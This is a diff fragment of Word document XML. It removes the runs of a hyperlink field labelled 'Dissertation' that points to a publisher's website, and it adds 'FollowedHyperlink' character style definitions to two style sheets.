-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Dissertation</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
         <w:instrText xml:space="preserve"> HYPERLINK "http://www.university-publishers.com/" \t "_blank" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="351C75"/>
-        </w:rPr>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3172,6 +2433,18 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="FollowedHyperlink">
+    <w:name w:val="FollowedHyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="005E2C4A"/>
+    <w:rPr>
+      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -3366,6 +2639,18 @@
     <w:rsid w:val="00D93B4B"/>
     <w:rPr>
       <w:color w:val="0000FF" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="FollowedHyperlink">
+    <w:name w:val="FollowedHyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="005E2C4A"/>
+    <w:rPr>
+      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
